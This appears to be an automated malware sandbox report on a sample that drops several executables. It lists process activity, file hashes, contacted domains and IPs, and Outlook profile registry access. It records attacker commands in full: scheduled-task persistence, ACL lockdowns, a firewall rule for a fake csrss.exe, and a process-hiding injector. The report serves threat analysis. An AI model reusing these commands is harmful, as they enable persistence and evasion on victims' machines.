PID 1724 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\FD04.exe C:\Users\Admin\AppData\Local\Temp\FD04.exe
PID 1724 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\FD04.exe C:\Users\Admin\AppData\Local\Temp\FD04.exe
PID 1724 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\FD04.exe C:\Users\Admin\AppData\Local\Temp\FD04.exe
PID 1724 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\FD04.exe C:\Users\Admin\AppData\Local\Temp\FD04.exe
PID 1724 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\FD04.exe C:\Users\Admin\AppData\Local\Temp\FD04.exe
PID 1724 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\FD04.exe C:\Users\Admin\AppData\Local\Temp\FD04.exe
PID 1724 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\FD04.exe C:\Users\Admin\AppData\Local\Temp\FD04.exe
PID 1724 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\FD04.exe C:\Users\Admin\AppData\Local\Temp\FD04.exe
PID 1724 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\FD04.exe C:\Users\Admin\AppData\Local\Temp\FD04.exe
PID 1724 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\FD04.exe C:\Users\Admin\AppData\Local\Temp\FD04.exe
PID 1724 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\FD04.exe C:\Users\Admin\AppData\Local\Temp\FD04.exe
PID 1220 wrote to memory of 2520 N/A N/A C:\Users\Admin\AppData\Local\Temp\159.exe
PID 1220 wrote to memory of 2520 N/A N/A C:\Users\Admin\AppData\Local\Temp\159.exe
PID 1220 wrote to memory of 2520 N/A N/A C:\Users\Admin\AppData\Local\Temp\159.exe
PID 1220 wrote to memory of 2520 N/A N/A C:\Users\Admin\AppData\Local\Temp\159.exe
PID 1220 wrote to memory of 1616 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1220 wrote to memory of 1616 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1220 wrote to memory of 1616 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1220 wrote to memory of 1616 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1220 wrote to memory of 1616 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1616 wrote to memory of 2168 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1616 wrote to memory of 2168 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1616 wrote to memory of 2168 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1616 wrote to memory of 2168 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1616 wrote to memory of 2168 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1616 wrote to memory of 2168 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1616 wrote to memory of 2168 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1220 wrote to memory of 1644 N/A N/A C:\Users\Admin\AppData\Local\Temp\1854.exe
PID 1220 wrote to memory of 1644 N/A N/A C:\Users\Admin\AppData\Local\Temp\1854.exe
PID 1220 wrote to memory of 1644 N/A N/A C:\Users\Admin\AppData\Local\Temp\1854.exe
PID 1220 wrote to memory of 1644 N/A N/A C:\Users\Admin\AppData\Local\Temp\1854.exe
PID 2532 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\FD04.exe C:\Windows\SysWOW64\icacls.exe
PID 2532 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\FD04.exe C:\Windows\SysWOW64\icacls.exe
PID 2532 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\FD04.exe C:\Windows\SysWOW64\icacls.exe
PID 2532 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\FD04.exe C:\Windows\SysWOW64\icacls.exe
PID 1220 wrote to memory of 2684 N/A N/A C:\Users\Admin\AppData\Local\Temp\214A.exe
PID 1220 wrote to memory of 2684 N/A N/A C:\Users\Admin\AppData\Local\Temp\214A.exe
PID 1220 wrote to memory of 2684 N/A N/A C:\Users\Admin\AppData\Local\Temp\214A.exe
PID 1220 wrote to memory of 2684 N/A N/A C:\Users\Admin\AppData\Local\Temp\214A.exe
PID 2684 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\214A.exe C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
PID 2684 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\214A.exe C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
PID 2684 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\214A.exe C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
PID 2684 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\214A.exe C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
PID 1220 wrote to memory of 1480 N/A N/A C:\Users\Admin\AppData\Local\Temp\4272.exe
PID 1220 wrote to memory of 1480 N/A N/A C:\Users\Admin\AppData\Local\Temp\4272.exe
PID 1220 wrote to memory of 1480 N/A N/A C:\Users\Admin\AppData\Local\Temp\4272.exe
PID 1220 wrote to memory of 1480 N/A N/A C:\Users\Admin\AppData\Local\Temp\4272.exe
PID 1220 wrote to memory of 2784 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 1220 wrote to memory of 2784 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 1220 wrote to memory of 2784 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 1220 wrote to memory of 2784 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 1220 wrote to memory of 2784 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2184 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Windows\SysWOW64\schtasks.exe
PID 2184 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Windows\SysWOW64\schtasks.exe
PID 2184 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Windows\SysWOW64\schtasks.exe
PID 2184 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Windows\SysWOW64\schtasks.exe
PID 1220 wrote to memory of 1860 N/A N/A C:\Windows\explorer.exe
PID 1220 wrote to memory of 1860 N/A N/A C:\Windows\explorer.exe
PID 1220 wrote to memory of 1860 N/A N/A C:\Windows\explorer.exe
PID 1220 wrote to memory of 1860 N/A N/A C:\Windows\explorer.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\NEAS.NEAS2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900exeexe_JC.exe

"C:\Users\Admin\AppData\Local\Temp\NEAS.NEAS2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900exeexe_JC.exe"

C:\Users\Admin\AppData\Local\Temp\FD04.exe

C:\Users\Admin\AppData\Local\Temp\FD04.exe

C:\Users\Admin\AppData\Local\Temp\FD04.exe

C:\Users\Admin\AppData\Local\Temp\FD04.exe

C:\Users\Admin\AppData\Local\Temp\159.exe

C:\Users\Admin\AppData\Local\Temp\159.exe

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\169E.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\169E.dll

C:\Users\Admin\AppData\Local\Temp\1854.exe

C:\Users\Admin\AppData\Local\Temp\1854.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\727fb0f1-09ae-4421-a570-c84a25e4aa61" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\214A.exe

C:\Users\Admin\AppData\Local\Temp\214A.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

"C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe"

C:\Users\Admin\AppData\Local\Temp\4272.exe

C:\Users\Admin\AppData\Local\Temp\4272.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN yiueea.exe /TR "C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe" /F

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "yiueea.exe" /P "Admin:N"&&CACLS "yiueea.exe" /P "Admin:R" /E&&echo Y|CACLS "..\577f58beff" /P "Admin:N"&&CACLS "..\577f58beff" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "yiueea.exe" /P "Admin:N"

C:\Users\Admin\AppData\Local\Temp\FD04.exe

"C:\Users\Admin\AppData\Local\Temp\FD04.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\cacls.exe

CACLS "yiueea.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\577f58beff" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\577f58beff" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\FD04.exe

"C:\Users\Admin\AppData\Local\Temp\FD04.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231017165424.log C:\Windows\Logs\CBS\CbsPersist_20231017165424.cab

C:\Users\Admin\AppData\Local\Temp\4272.exe

"C:\Users\Admin\AppData\Local\Temp\4272.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Users\Admin\AppData\Local\34c87081-bcc2-466e-9a99-2a915e5105bd\build2.exe

"C:\Users\Admin\AppData\Local\34c87081-bcc2-466e-9a99-2a915e5105bd\build2.exe"

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Users\Admin\AppData\Local\34c87081-bcc2-466e-9a99-2a915e5105bd\build2.exe

"C:\Users\Admin\AppData\Local\34c87081-bcc2-466e-9a99-2a915e5105bd\build2.exe"

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\34c87081-bcc2-466e-9a99-2a915e5105bd\build3.exe

"C:\Users\Admin\AppData\Local\34c87081-bcc2-466e-9a99-2a915e5105bd\build3.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\34c87081-bcc2-466e-9a99-2a915e5105bd\build3.exe

"C:\Users\Admin\AppData\Local\34c87081-bcc2-466e-9a99-2a915e5105bd\build3.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {BF383299-2619-4457-8E1A-077BC87DB665} S-1-5-21-3849525425-30183055-657688904-1000:KGPMNUDG\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 onualituyrs.org udp
US 8.8.8.8:53 sumagulituyo.org udp
US 34.94.245.237:80 sumagulituyo.org tcp
US 8.8.8.8:53 snukerukeutit.org udp
US 104.198.2.251:80 snukerukeutit.org tcp
US 8.8.8.8:53 lightseinsteniki.org udp
SG 34.143.166.163:80 lightseinsteniki.org tcp
US 8.8.8.8:53 liuliuoumumy.org udp
SG 34.143.166.163:80 liuliuoumumy.org tcp
US 8.8.8.8:53 stualialuyastrelia.net udp
RU 91.215.85.17:80 stualialuyastrelia.net tcp
US 8.8.8.8:53 api.2ip.ua udp
US 188.114.97.0:443 api.2ip.ua tcp
RU 79.137.192.18:80 79.137.192.18 tcp
US 8.8.8.8:53 alayyadcare.com udp
PS 213.6.54.58:443 alayyadcare.com tcp
PS 213.6.54.58:443 alayyadcare.com tcp
US 8.8.8.8:53 montereyclub.org udp
US 104.21.21.57:443 montereyclub.org tcp
US 8.8.8.8:53 loveperry.org udp
US 104.21.86.8:443 loveperry.org tcp
US 188.114.97.0:443 api.2ip.ua tcp
RU 79.137.192.18:80 79.137.192.18 tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 colisumy.com udp
US 8.8.8.8:53 zexeq.com udp
KR 211.181.24.132:80 zexeq.com tcp
UY 167.61.217.190:80 colisumy.com tcp
RU 31.41.244.27:41140 tcp
FR 51.254.67.186:16176 tcp
KR 211.181.24.132:80 zexeq.com tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 steamcommunity.com udp
JP 23.207.106.113:443 steamcommunity.com tcp
US 8.8.8.8:53 e923f592-13e1-4016-88b1-5bf5e78202c7.uuid.statsexplorer.org udp
US 8.8.8.8:53 crl.microsoft.com udp
US 2.18.121.143:80 crl.microsoft.com tcp
DE 49.12.118.149:80 49.12.118.149 tcp

Files

memory/2420-1-0x0000000000940000-0x0000000000A40000-memory.dmp

memory/2420-2-0x0000000000400000-0x00000000007CC000-memory.dmp

memory/2420-3-0x0000000000220000-0x000000000022B000-memory.dmp

memory/1220-4-0x0000000002700000-0x0000000002716000-memory.dmp

memory/2420-5-0x0000000000400000-0x00000000007CC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FD04.exe

MD5 3d0534c699f0f264c2ecedebb5cf3af8
SHA1 f0cb1804fe81dba82b085e51d64953a77dc5e174
SHA256 e4f573f8d774dce16cdd944525f599465be442656870081fb66f91dd2b7db230
SHA512 69d8c00bc663cea2c5deca5bdc24b59f1e82d5439676b9eb2a719902c273d5611c2cfc00b72c750411f06361b74ace3e8b16ae3c20a755418f5432479603b62d

C:\Users\Admin\AppData\Local\Temp\FD04.exe

MD5 3d0534c699f0f264c2ecedebb5cf3af8
SHA1 f0cb1804fe81dba82b085e51d64953a77dc5e174
SHA256 e4f573f8d774dce16cdd944525f599465be442656870081fb66f91dd2b7db230
SHA512 69d8c00bc663cea2c5deca5bdc24b59f1e82d5439676b9eb2a719902c273d5611c2cfc00b72c750411f06361b74ace3e8b16ae3c20a755418f5432479603b62d

memory/1724-20-0x0000000000340000-0x00000000003D2000-memory.dmp

memory/1724-21-0x0000000000340000-0x00000000003D2000-memory.dmp

memory/1724-22-0x0000000001FB0000-0x00000000020CB000-memory.dmp

\Users\Admin\AppData\Local\Temp\FD04.exe

MD5 3d0534c699f0f264c2ecedebb5cf3af8
SHA1 f0cb1804fe81dba82b085e51d64953a77dc5e174
SHA256 e4f573f8d774dce16cdd944525f599465be442656870081fb66f91dd2b7db230
SHA512 69d8c00bc663cea2c5deca5bdc24b59f1e82d5439676b9eb2a719902c273d5611c2cfc00b72c750411f06361b74ace3e8b16ae3c20a755418f5432479603b62d

C:\Users\Admin\AppData\Local\Temp\FD04.exe

MD5 3d0534c699f0f264c2ecedebb5cf3af8
SHA1 f0cb1804fe81dba82b085e51d64953a77dc5e174
SHA256 e4f573f8d774dce16cdd944525f599465be442656870081fb66f91dd2b7db230
SHA512 69d8c00bc663cea2c5deca5bdc24b59f1e82d5439676b9eb2a719902c273d5611c2cfc00b72c750411f06361b74ace3e8b16ae3c20a755418f5432479603b62d

memory/2532-26-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2532-28-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1724-31-0x0000000000340000-0x00000000003D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FD04.exe

MD5 3d0534c699f0f264c2ecedebb5cf3af8
SHA1 f0cb1804fe81dba82b085e51d64953a77dc5e174
SHA256 e4f573f8d774dce16cdd944525f599465be442656870081fb66f91dd2b7db230
SHA512 69d8c00bc663cea2c5deca5bdc24b59f1e82d5439676b9eb2a719902c273d5611c2cfc00b72c750411f06361b74ace3e8b16ae3c20a755418f5432479603b62d

memory/2532-36-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2520-35-0x00000000008D0000-0x0000000001078000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\159.exe

MD5 77f6f0504e40c95483da601ee1de4a4e
SHA1 628094e713d9f970b63091f6dec44f8feb6e26b2
SHA256 ad6a9a78ad3c6dceb908df1a46665b85c91888b4915fd514c0305048d8e8c111
SHA512 7e01b7917d61054360ef451a0a4a4be856e04bda77082fd63beae43e345af61c10d11f64021182913f74248b41b037a40d83e9cb6f2897a99001591bd2595b63

memory/2532-37-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2520-38-0x00000000759A0000-0x0000000075AB0000-memory.dmp

memory/2520-39-0x00000000759A0000-0x0000000075AB0000-memory.dmp

memory/2520-40-0x00000000759A0000-0x0000000075AB0000-memory.dmp

memory/2520-41-0x00000000759A0000-0x0000000075AB0000-memory.dmp

memory/2520-42-0x0000000076E60000-0x0000000076EA7000-memory.dmp

memory/2520-44-0x00000000759A0000-0x0000000075AB0000-memory.dmp

memory/2520-46-0x00000000759A0000-0x0000000075AB0000-memory.dmp

memory/2520-47-0x00000000759A0000-0x0000000075AB0000-memory.dmp

memory/2520-48-0x00000000759A0000-0x0000000075AB0000-memory.dmp

memory/2520-49-0x00000000759A0000-0x0000000075AB0000-memory.dmp

memory/2520-50-0x00000000759A0000-0x0000000075AB0000-memory.dmp

memory/2520-51-0x0000000076E60000-0x0000000076EA7000-memory.dmp

memory/2520-52-0x00000000759A0000-0x0000000075AB0000-memory.dmp

memory/2520-54-0x00000000759A0000-0x0000000075AB0000-memory.dmp

memory/2520-55-0x00000000759A0000-0x0000000075AB0000-memory.dmp

memory/2520-53-0x00000000759A0000-0x0000000075AB0000-memory.dmp

memory/2520-56-0x00000000759A0000-0x0000000075AB0000-memory.dmp

memory/2520-58-0x0000000077E80000-0x0000000077E82000-memory.dmp

memory/2520-57-0x00000000759A0000-0x0000000075AB0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\169E.dll

MD5 a43d9991721fcd1521677bf31c21ce21
SHA1 0e86179bdcf8685b9bd7da13cd9aa10218f0d81c
SHA256 6561ae7f88e51c053e856b98418192ff7aa85a4f7a16460fb769073fe4535197
SHA512 233bf239b73e9b398d2666ab21cd3ecf930b98c935cbe5e7d5f325fb8bdb9b7ec064a4aecc73228fbb9c35a9f0dd1503e2f66b6f18e5931d0f4567fc2dc02459

memory/2520-60-0x00000000008D0000-0x0000000001078000-memory.dmp

memory/2520-62-0x0000000074C00000-0x00000000752EE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1854.exe

MD5 9a31a97c4280c2f132874184bc1864eb
SHA1 424f3577733ecdf081cff3c0b765668fa94bf106
SHA256 d50a823a85ebd19a7e61abd091d90b5735c78a4f9f0f32f99c05846c2be45681
SHA512 01facbb50b5cc39e2f91f79e0c3b0448a5804650459c06ee1287f587376df474b30348d825efc8ea6fe2773762db5cad328dc07df53c1273208692d4662dd87c

\Users\Admin\AppData\Local\Temp\169E.dll

MD5 a43d9991721fcd1521677bf31c21ce21
SHA1 0e86179bdcf8685b9bd7da13cd9aa10218f0d81c
SHA256 6561ae7f88e51c053e856b98418192ff7aa85a4f7a16460fb769073fe4535197
SHA512 233bf239b73e9b398d2666ab21cd3ecf930b98c935cbe5e7d5f325fb8bdb9b7ec064a4aecc73228fbb9c35a9f0dd1503e2f66b6f18e5931d0f4567fc2dc02459

C:\Users\Admin\AppData\Local\Temp\1854.exe

MD5 9a31a97c4280c2f132874184bc1864eb
SHA1 424f3577733ecdf081cff3c0b765668fa94bf106
SHA256 d50a823a85ebd19a7e61abd091d90b5735c78a4f9f0f32f99c05846c2be45681
SHA512 01facbb50b5cc39e2f91f79e0c3b0448a5804650459c06ee1287f587376df474b30348d825efc8ea6fe2773762db5cad328dc07df53c1273208692d4662dd87c

memory/2168-84-0x0000000000180000-0x0000000000186000-memory.dmp

memory/2168-76-0x0000000010000000-0x00000000101E3000-memory.dmp

memory/2532-89-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\214A.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

memory/2520-95-0x00000000008D0000-0x0000000001078000-memory.dmp

memory/2520-96-0x00000000759A0000-0x0000000075AB0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

C:\Users\Admin\AppData\Local\727fb0f1-09ae-4421-a570-c84a25e4aa61\FD04.exe

MD5 3d0534c699f0f264c2ecedebb5cf3af8
SHA1 f0cb1804fe81dba82b085e51d64953a77dc5e174
SHA256 e4f573f8d774dce16cdd944525f599465be442656870081fb66f91dd2b7db230
SHA512 69d8c00bc663cea2c5deca5bdc24b59f1e82d5439676b9eb2a719902c273d5611c2cfc00b72c750411f06361b74ace3e8b16ae3c20a755418f5432479603b62d

C:\Users\Admin\AppData\Local\Temp\214A.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

memory/2520-101-0x0000000076E60000-0x0000000076EA7000-memory.dmp

memory/2520-102-0x00000000759A0000-0x0000000075AB0000-memory.dmp

memory/2520-103-0x00000000759A0000-0x0000000075AB0000-memory.dmp

memory/2520-104-0x00000000759A0000-0x0000000075AB0000-memory.dmp

memory/2168-105-0x00000000022B0000-0x00000000023CB000-memory.dmp

memory/2168-106-0x0000000010000000-0x00000000101E3000-memory.dmp

memory/2168-107-0x0000000001E60000-0x0000000001F5F000-memory.dmp

memory/2168-110-0x0000000001E60000-0x0000000001F5F000-memory.dmp

memory/2168-112-0x0000000001E60000-0x0000000001F5F000-memory.dmp

memory/2520-113-0x0000000074C00000-0x00000000752EE000-memory.dmp

\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

C:\Users\Admin\AppData\Local\Temp\4272.exe

MD5 71b9cd84ec146c642e076dfb2a87c31a
SHA1 18f593471c238beb864de6425c0343cbb0ea8597
SHA256 19c9a046edef05ab14dcb86a46de9361190b07b0ef628771a00a36564192d309
SHA512 af8402aa35dc3f2fd112359c0a34187756e258f96f67775513b7df2ddaf0f0b7887f730b877ba16ccd8fa5f95f54a47355dacc226f5c6c5cdf2aa7b596a6872c

C:\Users\Admin\AppData\Local\Temp\4272.exe

MD5 71b9cd84ec146c642e076dfb2a87c31a
SHA1 18f593471c238beb864de6425c0343cbb0ea8597
SHA256 19c9a046edef05ab14dcb86a46de9361190b07b0ef628771a00a36564192d309
SHA512 af8402aa35dc3f2fd112359c0a34187756e258f96f67775513b7df2ddaf0f0b7887f730b877ba16ccd8fa5f95f54a47355dacc226f5c6c5cdf2aa7b596a6872c

memory/2532-126-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1480-125-0x00000000025B0000-0x00000000029A8000-memory.dmp

memory/1480-128-0x00000000025B0000-0x00000000029A8000-memory.dmp

memory/1480-129-0x00000000029B0000-0x000000000329B000-memory.dmp

memory/1480-130-0x0000000000400000-0x0000000000D6F000-memory.dmp

memory/1860-131-0x0000000000060000-0x000000000006C000-memory.dmp

memory/1860-132-0x0000000000060000-0x000000000006C000-memory.dmp

memory/1860-133-0x0000000000400000-0x0000000000D6F000-memory.dmp

\Users\Admin\AppData\Local\Temp\FD04.exe

MD5 3d0534c699f0f264c2ecedebb5cf3af8
SHA1 f0cb1804fe81dba82b085e51d64953a77dc5e174
SHA256 e4f573f8d774dce16cdd944525f599465be442656870081fb66f91dd2b7db230
SHA512 69d8c00bc663cea2c5deca5bdc24b59f1e82d5439676b9eb2a719902c273d5611c2cfc00b72c750411f06361b74ace3e8b16ae3c20a755418f5432479603b62d

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

\Users\Admin\AppData\Local\Temp\FD04.exe

MD5 3d0534c699f0f264c2ecedebb5cf3af8
SHA1 f0cb1804fe81dba82b085e51d64953a77dc5e174
SHA256 e4f573f8d774dce16cdd944525f599465be442656870081fb66f91dd2b7db230
SHA512 69d8c00bc663cea2c5deca5bdc24b59f1e82d5439676b9eb2a719902c273d5611c2cfc00b72c750411f06361b74ace3e8b16ae3c20a755418f5432479603b62d

memory/2784-138-0x0000000000150000-0x00000000001C5000-memory.dmp

memory/2784-137-0x00000000000E0000-0x000000000014B000-memory.dmp

memory/2532-139-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2784-140-0x00000000000E0000-0x000000000014B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FD04.exe

MD5 3d0534c699f0f264c2ecedebb5cf3af8
SHA1 f0cb1804fe81dba82b085e51d64953a77dc5e174
SHA256 e4f573f8d774dce16cdd944525f599465be442656870081fb66f91dd2b7db230
SHA512 69d8c00bc663cea2c5deca5bdc24b59f1e82d5439676b9eb2a719902c273d5611c2cfc00b72c750411f06361b74ace3e8b16ae3c20a755418f5432479603b62d

